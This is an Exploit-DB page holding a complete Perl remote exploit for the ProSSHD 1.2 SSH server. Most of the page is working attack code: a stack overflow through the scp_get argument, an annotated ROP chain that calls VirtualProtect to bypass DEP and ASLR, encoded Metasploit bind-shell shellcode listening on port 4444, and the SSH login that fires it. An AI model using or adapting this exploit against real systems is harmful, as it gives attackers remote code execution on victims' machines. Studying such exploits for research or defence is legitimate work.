ProSSHD 1.2 - (Authenticated) Remote (ASLR + DEP Bypass)

EDB-ID:

12495

CVE:

N/A

EDB Verified:

Author:

Alexey Sintsov

Type:

remote

Exploit:   /  

Platform:

Windows

Date:

2010-05-03

Vulnerable App: 
# Exploit Title: ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)
# Date: 03.05.2010
# Author: Alexey Sintsov
# Version: 1.2
# Tested on: Windows XP SP3 / Windows 7
# CVE : 
# Code : 

################################################################################
# Original exploit by S2 Crew [Hungary] 
# * * *
# ROP for DEP and ASLR bypass by Alexey Sintsov from DSecRG [www.dsecrg.com]
# * * *
# Tested on:  ProSSHD v1.2 on Windows XP and Windows 7 with DEP for all
# 
# Special for XAKEP magazine  [www.xakep.ru]
#
#
# CVE: - 
  
#!/usr/bin/perl 
  
use Net::SSH2; 
  
$username = ''; 
$password = ''; 
  
$host = '192.168.126.129';  #Remote host
#$host = '192.168.13.6'; 
$port = 22; 
  

# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LPORT=4444, RHOST=, EXITFUNC=process, InitialAutoRunScript=, 
# AutoRunScript=
$shell = 
"\xba\xda\x29\x13\xda\xd9\xe9\xd9\x74\x24\xf4\x58\x31\xc9" .
"\xb1\x56\x31\x50\x13\x83\xc0\x04\x03\x50\xd5\xcb\xe6\x26" .
"\x01\x82\x09\xd7\xd1\xf5\x80\x32\xe0\x27\xf6\x37\x50\xf8" .
"\x7c\x15\x58\x73\xd0\x8e\xeb\xf1\xfd\xa1\x5c\xbf\xdb\x8c" .
"\x5d\x71\xe4\x43\x9d\x13\x98\x99\xf1\xf3\xa1\x51\x04\xf5" .
"\xe6\x8c\xe6\xa7\xbf\xdb\x54\x58\xcb\x9e\x64\x59\x1b\x95" .
"\xd4\x21\x1e\x6a\xa0\x9b\x21\xbb\x18\x97\x6a\x23\x13\xff" .
"\x4a\x52\xf0\xe3\xb7\x1d\x7d\xd7\x4c\x9c\x57\x29\xac\xae" .
"\x97\xe6\x93\x1e\x1a\xf6\xd4\x99\xc4\x8d\x2e\xda\x79\x96" .
"\xf4\xa0\xa5\x13\xe9\x03\x2e\x83\xc9\xb2\xe3\x52\x99\xb9" .
"\x48\x10\xc5\xdd\x4f\xf5\x7d\xd9\xc4\xf8\x51\x6b\x9e\xde" .
"\x75\x37\x45\x7e\x2f\x9d\x28\x7f\x2f\x79\x95\x25\x3b\x68" .
"\xc2\x5c\x66\xe5\x27\x53\x99\xf5\x2f\xe4\xea\xc7\xf0\x5e" .
"\x65\x64\x79\x79\x72\x8b\x50\x3d\xec\x72\x5a\x3e\x24\xb1" .
"\x0e\x6e\x5e\x10\x2e\xe5\x9e\x9d\xfb\xaa\xce\x31\x53\x0b" .
"\xbf\xf1\x03\xe3\xd5\xfd\x7c\x13\xd6\xd7\x0b\x13\x18\x03" .
"\x58\xf4\x59\xb3\x4f\x58\xd7\x55\x05\x70\xb1\xce\xb1\xb2" .
"\xe6\xc6\x26\xcc\xcc\x7a\xff\x5a\x58\x95\xc7\x65\x59\xb3" .
"\x64\xc9\xf1\x54\xfe\x01\xc6\x45\x01\x0c\x6e\x0f\x3a\xc7" .
"\xe4\x61\x89\x79\xf8\xab\x79\x19\x6b\x30\x79\x54\x90\xef" .
"\x2e\x31\x66\xe6\xba\xaf\xd1\x50\xd8\x2d\x87\x9b\x58\xea" .
"\x74\x25\x61\x7f\xc0\x01\x71\xb9\xc9\x0d\x25\x15\x9c\xdb" .
"\x93\xd3\x76\xaa\x4d\x8a\x25\x64\x19\x4b\x06\xb7\x5f\x54" .
"\x43\x41\xbf\xe5\x3a\x14\xc0\xca\xaa\x90\xb9\x36\x4b\x5e" .
"\x10\xf3\x7b\x15\x38\x52\x14\xf0\xa9\xe6\x79\x03\x04\x24" .
"\x84\x80\xac\xd5\x73\x98\xc5\xd0\x38\x1e\x36\xa9\x51\xcb" .
"\x38\x1e\x51\xde";


  
$fuzz = "\x41"x491 .  # buffer before RET addr rewriting

###############################   ROP   
# All ROP instructions from non ASLR modules (coming with ProSHHD distrib): MSVCR71.DLL and MFC71.DLL   
# For DEP bypass used VirtualProtect call from non ASLR DLL - 0x7C3528DD (MSVCR71.DLL)
# this make stack executable:

#### RET rewrite###
"\x9F\x07\x37\x7C".  # MOV EAX, EDI / POP EDI / POP ESI / RETN 	; EAX points on our stack data with some offset

"\x11\x11\x11\x11".  # JUNK---------------^^^       ^^^  
"\x22\x22\x22\x22".  # JUNK-------------------------^^^ 
"\x27\x34\x34\x7C".  # MOV ECX, EAX / MOV EAX, ESI / POP ESI / RETN 10
"\x33\x33\x33\x33".  # JUNK------------------------------^^^ 

"\xC1\x4C\x34\x7C".  # POP EAX  / RETN
                     #     ^^^ 
"\x33\x33\x33\x33".  #     ^^^
"\x33\x33\x33\x33".  #     ^^^
"\x33\x33\x33\x33".  #     ^^^
"\x33\x33\x33\x33".  #     ^^^
                     #     ^^^
"\xC0\xFF\xFF\xFF".  # ----^^^  Param for next instruction...
"\x05\x1e\x35\x7C".  # NEG EAX /  RETN 	   ; EAX will be 0x40 (param for VirtualProtect)

"\xc8\x03\x35\x7C".  # MOV DS:[ECX], EAX / RETN    ; save 0x40 (3 param)
"\x40\xa0\x35\x7C".  # MOV EAX, ECX / RETN		   ; restore pointer in EAX 

"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN             ; Change position
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN						
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN				; EAX=ECX-0x0c

"\x08\x94\x16\x7C".  # MOV DS:[EAX+0x4], EAX / RETN ;save addres for VirtualProtect (1 param)

"\xB9\x1F\x34\x7C".  # INC EAX / RETN				; oh ... and move pointer back
"\xB9\x1F\x34\x7C".  # INC EAX / RETN
"\xB9\x1F\x34\x7C".  # INC EAX / RETN
"\xB9\x1F\x34\x7C".  # INC EAX / RETN				; EAX=ECX=0x8

"\xB2\x01\x15\x7C".  # MOV [EAX+0x4], 1			; size for VirtualProtect (2 param)

"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN             ; Change position for output from VirtualProtect
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN						
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN

"\x27\x34\x34\x7C".  # MOV ECX, EAX / MOV EAX, ESI / POP ESI / RETN 10
"\x33\x33\x33\x33".  # JUNK------------------------------^^^ 

"\x40\xa0\x35\x7C".  # MOV EAX, ECX / RETN		   ; restore pointer in EAX 
                     #      
"\x33\x33\x33\x33".  #     
"\x33\x33\x33\x33".  #     
"\x33\x33\x33\x33".  #     
"\x33\x33\x33\x33".  #     

"\xB9\x1F\x34\x7C".  # INC EAX / RETN			   ; and again... 
"\xB9\x1F\x34\x7C".  # INC EAX / RETN
"\xB9\x1F\x34\x7C".  # INC EAX / RETN
"\xB9\x1F\x34\x7C".  # INC EAX / RETN

"\xE5\x6B\x36\x7C".   # MOV DS:[EAX+0x14], ECX             ; save output addr for VirtualProtect (4 param)

"\xBA\x1F\x34\x7C"x204 . # RETN fill.....

"\xDD\x28\x35\x7C".  # CALL VirtualProtect / LEA ESP, [EBP-58] / POP EDI / ESI / EBX / RETN  ;Call VirtualProtect 
"AAAABBBBCCCCDDDD".   # Here is place for params (VirtualProtect) 

####################### retrun into stack after VirtualProtect
"\x1A\xF2\x35\x7C".   # ADD ESP, 0xC / RETN                        ; take next ret 
"XXXYYYZZZ123".       # trash
"\x30\x5C\x34\x7C".   # 0x7c345c2e: ANDPS XMM0, XMM3  -- (+0x2 to address and....)  --> PUSH ESP / RETN ; EIP=ESP

"\x90"x14 .           # NOPs here is the begining of shellcode

$shell; 	      # shellcode 8)
	
  
$ssh2 = Net::SSH2->new(); 
$ssh2->connect($host, $port) || die "\nError: Connection Refused!\n"; 
$ssh2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n"; 
#sleep(10);
$scpget = $ssh2->scp_get($fuzz); 
$ssh2->disconnect();
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services